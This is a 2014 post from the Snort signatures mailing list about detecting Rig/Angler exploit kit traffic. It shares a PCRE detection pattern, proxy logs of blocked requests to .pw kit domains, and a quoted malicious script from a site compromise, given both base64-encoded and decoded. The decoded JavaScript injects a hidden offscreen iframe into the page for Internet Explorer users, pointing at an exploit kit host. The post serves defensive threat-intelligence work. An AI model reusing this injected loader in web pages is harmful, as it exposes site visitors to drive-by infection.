Snort mailing list archives
Re: Rig Exploit Kit outbound URI request signature
From: "lists () packetmail net" <lists () packetmail net>
Date: Thu, 10 Jul 2014 10:32:15 -0500
On 07/10/2014 10:21 AM, Nicholas Mavis (nmavis) wrote:
No love for this rule?
TLP WHITE w/Attribution: It's not comprehensive though, there are many other names used not just 'nbe', for example there is blde too. I am using this PCRE, I found this back on 5/27 related to the food.com compromise. pcre:"/^\/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$/U"; regex((?-i)^http:\/\/[^\x2f]+\/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$) Ryan C. Moon & Nathan Fowler, 2014-07-03, Modified from 2014-05-27 Angler EK Landing related to Food.com /ajax/ajax.js compromise. The landing produces: window.rctm('dmFyIHVhID0gbmF2aWdhdG9yLnVzZXJBZ2VudC50b0xvd2VyQ2FzZSgpO2lmKHVhLmluZGV4T2YoIm1zaWUiKSAhPSAtMSB8fCAoKHVhLmluZGV4T2YoInRyaWRlbnQiKSAhPSAtMSkgJiYgKHVhLmluZGV4T2YoInJ2OjExIikgIT0gLTEpKSl7dmFyIGQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7dmFyIGY9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnaScrJ2ZyJysnYW1lJyk7Zi5zZXRBdHRyaWJ1dGUoJ3N0eWxlJywnd2lkdGg6MTAwcHg7aGVpZ2h0OjEwMHB4O3Bvc2l0aW9uOmFic29sdXRlO2xlZnQ6LTEwMDAwcHg7dG9wOjA7Jyk7Zi5zZXRBdHRyaWJ1dGUoJ3NyYycsICdodHRwOi8vdGFuc2V5bXVnbm9sby52dWxuZXJhYmxlYWR1bHRyZXNvdXJjZXMuY29tOjI5ODAvZjJ6YTUydHFmcS5waHAnKTtkLmFwcGVuZENoaWxkKGYpO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZCk7fQ=='); Decoded this is: var ua = navigator.userAgent.toLowerCase();if(ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))){var d=document.createElement('div');var f=document.createElement('i'+'fr'+'ame');f.setAttribute('style','width:100px;height:100px;position:absolute;left:-10000px;top:0;');f.setAttribute('src', 'http://tanseymugnolo.vulnerableadultresources.com:2980/f2za52tqfq.php');d.appendChild(f);document.body.appendChild(d);} Here are my samples from the query I ran on 07/03/2014: SELECT date_time,client_ip,user_name,command,http_status,block_reason,url_body_size,dest_ip,url,url_referrer FROM webwasher_full WHERE day >= '2014-06-01' and ( url rlike '^http:\\/\\/[^\\x2f]+\\/[a-z]+\\.html\\?[0-9]\\.[0-9]+[a-z]?$' and http_status <> '407' ) order by dest_ip,date_time; GET 403 url-block 4689 108.162.199.144 meow://22fabf76.pw/blde.html?0.006334243109449744 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4689 108.162.199.144 meow://22fabf76.pw/blde.html?0.016409865114837885 meow://www.askmen.com/dating/player_150/193_love_games.html GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.06354187265969813 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.07202741224318743 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_5.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.1041158998850733 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.10766582423821092 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.13074382906779647 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.20054056216031313 meow://www.askmen.com/dating/player_250/293b_the-player-body-language-that-leads-to-sex.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.23090991470962763 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2415963737294078 meow://www.askmen.com/dating/player_150/193b_love_games.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.24997977446764708 meow://www.askmen.com/dating/player/ GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.2549178213812411 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_2.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.26690258318558335 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_9.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2707027194555849 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_3.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2994266119785607 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.3438303011935204 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_1.html GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.36082233721390367 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.37289803847670555 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.3867847693618387 meow://www.askmen.com/dating/player_150/193b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4253211112227291 meow://www.askmen.com/dating/player_150/193_love_games.html GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.44411907298490405 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4443054897710681 meow://www.askmen.com/dating/player_150/193c_love_games.html GET 403 url-block 4679 108.162.199.144 meow://22fabf76.pw/blde.html?0.4554368711542338 meow://www.askmen.com/money/how_to/best-man-speech.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4781910087913275 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.5013891162816435 meow://www.askmen.com/dating/ GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.5081519205123186 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.6199873678851873 meow://www.askmen.com/dating/player_250/293_the-player-body-language-that-leads-to-sex.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.6605944740585983 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.6656237081624568 meow://www.askmen.com/dating/player/ GET 403 url-block 4681 108.162.199.144 meow://22fabf76.pw/blde.html?0.68715750426054 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_8.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.7267832655925304 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_7.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8383729031775147 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4681 108.162.199.144 meow://22fabf76.pw/blde.html?0.85340212774463 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_10.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8565535638481379 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_6.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8595981544349343 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8642684002406895 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8773749363608658 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8801867682486773 meow://www.askmen.com/dating/player_150/184_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9061996066011488 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9111072514206171 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9290966757107526 meow://www.askmen.com/dating/player_250/293_the-player-body-language-that-leads-to-sex.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9500252392608672 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_4.html GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9815117917023599 meow://www.askmen.com/dating/player/ GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.9978509696666151 meow://www.askmen.com/dating/player_150/184b_love_games.html GET 403 url-block 4718 108.162.198.14 meow://31674ec.pw/nbe.html?0.904447927671759 meow://www.123rf.com/stock-photo/shivering.html GET 403 url-block 4753 108.162.199.92 meow://9b66653c.pw/nbe.html?0.08473309073626933 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches.html GET 403 url-block 4753 108.162.199.92 meow://9b66653c.pw/nbe.html?0.17622659508624233 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches.html GET 200 - 1022 108.162.198.92 meow://9b66653c.pw/nbe.html?0.5499927302485725 - GET 403 url-block 4751 108.162.199.92 meow://9b66653c.pw/nbe.html?0.5499927302485725 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches-2.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.06389605655075187 meow://www.askmen.com/top_10/cars/top-10-best-car-names_7.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.17722866794067066 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.20031634056180342 meow://www.askmen.com/top_10/cars/top-10-best-car-names_1.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.24860330938667213 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.27150209070258263 meow://www.askmen.com/top_10/cars/top-10-best-car-names_5.html GET 403 url-block 4736 108.162.197.130 meow://be90becd.pw/nbe.html?0.284285031791501 meow://www.askmen.com/top_10/cars/top-10-best-car-names_6.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.37768174085568545 meow://www.askmen.com/top_10/cars/top-10-best-car-names.html GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.48231242343805913 meow://www.askmen.com/top_10/cars/top-10-best-car-names_3.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.5128278504934043 meow://www.askmen.com/top_10/cars/top-10-best-car-names_4.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.7540135384147115 meow://www.askmen.com/top_10/cars/top-10-best-car-names_3.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.7734210000823842 meow://www.askmen.com/top_10/cars/top-10-best-car-names_9.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.8939608857165528 meow://www.askmen.com/top_10/cars/top-10-best-car-names_10.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.9601377932116697 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.9989356211076701 meow://www.askmen.com/top_10/cars/top-10-best-car-names_8.html Cheers, Nathan Fowler ------------------------------------------------------------------------------ Open source business process management suite built on Java and Eclipse Turn processes into business applications with Bonita BPM Community Edition Quickly connect people, data, and systems into organized workflows Winner of BOSSIE, CODIE, OW2 and Gartner awards http://p.sf.net/sfu/Bonitasoft _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 03)
- <Possible follow-ups>
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 03)
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)